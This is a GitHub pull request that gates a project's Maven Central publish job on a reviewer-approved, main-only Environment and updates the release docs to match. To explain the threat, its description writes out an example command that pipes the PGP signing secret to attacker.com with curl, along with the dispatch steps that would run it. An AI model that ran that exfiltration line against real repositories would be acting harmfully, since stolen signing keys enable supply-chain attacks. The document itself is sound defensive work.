### PR TITLE
Gate Maven publish on a required-reviewer Environment

### DIFF
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -99,6 +99,9 @@ jobs:
   publish-maven:
     name: Publish lib + cli to Maven Central
     runs-on: ubuntu-latest
+    # No-op unless `maven-central` env is configured in repo settings with the
+    # SONATYPE_* / PGP_* secrets moved onto it (see RELEASING.md).
+    environment: maven-central
     permissions:
       contents: read
 

--- a/RELEASING.md
+++ b/RELEASING.md
@@ -65,9 +65,13 @@ mvn"org.virtuslab::cellar-lib:<version>"
 mvn"org.virtuslab::cellar-cli:<version>"
 ```
 
-### Required GitHub secrets
+### Required secrets — on the `maven-central` GitHub Environment
 
-The Maven publish step in `.github/workflows/release.yml` reads four repository secrets:
+The `publish-maven` job is gated on a GitHub Environment named `maven-central`. Without it the job will fail to start and no secrets are exposed. Configure the environment under **Settings → Environments → New environment → `maven-central`**:
+
+- **Required reviewers**: at least one trusted maintainer. Each release run pauses at the publish step until a reviewer approves in the Actions UI.
+- **Deployment branches and tags**: "Selected branches" → only `main`. Prevents a workflow_dispatch from a feature branch from accessing the secrets at all.
+- **Environment secrets** (NOT repo-level secrets):
 
 | Secret | Purpose |
 |---|---|
@@ -76,7 +80,9 @@ The Maven publish step in `.github/workflows/release.yml` reads four repository 
 | `PGP_SECRET` | Base64-encoded ASCII-armored PGP private key (artifact signatures) |
 | `PGP_PASSPHRASE` | Passphrase for the PGP key |
 
-Mill reads these via `MILL_SONATYPE_USERNAME` / `MILL_SONATYPE_PASSWORD` / `MILL_PGP_SECRET_BASE64` / `MILL_PGP_PASSPHRASE` environment variables.
+Why on the environment, not the repo: a workflow on a non-`main` branch can read any repo-level secret if it's modified to `echo` it; environment secrets are only injected when the environment's branch rule is satisfied AND the reviewer approves.
+
+Mill reads these via `MILL_SONATYPE_USERNAME` / `MILL_SONATYPE_PASSWORD` / `MILL_PGP_SECRET_BASE64` / `MILL_PGP_PASSPHRASE` environment variables — the workflow's `env:` block is the bridge.
 
 The PGP signing here is unrelated to the cosign signing of `checksums.txt` — Sonatype Central mandates `.asc` signatures on every uploaded artifact (`.jar`, `.pom`, `-sources.jar`, `-javadoc.jar`), while cosign covers the GitHub Release assets.
 


### PR DESCRIPTION
## Summary

Follow-up to #70 — addresses the "anyone with push access can exfiltrate `PGP_SECRET` via a malicious workflow change" risk by moving the four publish-time secrets behind a GitHub Environment with required reviewers and a `main`-only branch rule.

## Threat being mitigated

GitHub's secret masking is anti-spam, not security. With `workflow_dispatch` and repo-level secrets, anyone with push access could:

1. Push a branch with a modified `.github/workflows/release.yml` that does `echo "$MILL_PGP_SECRET_BASE64" | base64 | curl https://attacker.com -d @-`.
2. Run `gh workflow run release.yml --ref my-branch -f version=…`.
3. Walk away with the signing key.

The `with: ref: main` checkout pinning added in the previous PR protects the *artifact contents*, but the workflow YAML executed on the runner still comes from the dispatch ref — so it doesn't help here.

## Fix

`publish-maven` job now declares `environment: maven-central`. With the matching Environment configured (see RELEASING.md):

- **Required reviewers** — release runs pause at the publish step until a maintainer approves. A malicious workflow run never gets to inject the secret unless someone clicks "Approve" on it.
- **Deployment branches: `main` only** — the secrets are simply not visible to runs from any other ref. A feature-branch dispatch fails the gate before the runner ever sees the values.
- **Secrets live on the environment**, not the repo — repo-level secrets are removed.

## Required setup before this is effective

The YAML change alone is a no-op (the workflow will fail to start until the Environment exists). After merging, configure under **Settings → Environments → New environment → `maven-central`**:

- [ ] Required reviewers: at least one trusted maintainer
- [ ] Deployment branches and tags: "Selected branches" → `main`
- [ ] Move `SONATYPE_USERNAME`, `SONATYPE_PASSWORD`, `PGP_SECRET`, `PGP_PASSPHRASE` from repo-level secrets onto the environment (delete the repo-level copies)

Sonatype Central still doesn't have OIDC trusted publishing (we'd use that if it existed), so a long-lived secret is unavoidable. This is the next-best mitigation.

## Test plan

- [ ] After Environment is configured, dispatch the workflow from `main` and confirm the publish step pauses for approval
- [ ] Dispatch from a feature branch; confirm the publish job fails (cannot deploy to environment) before any secret is referenced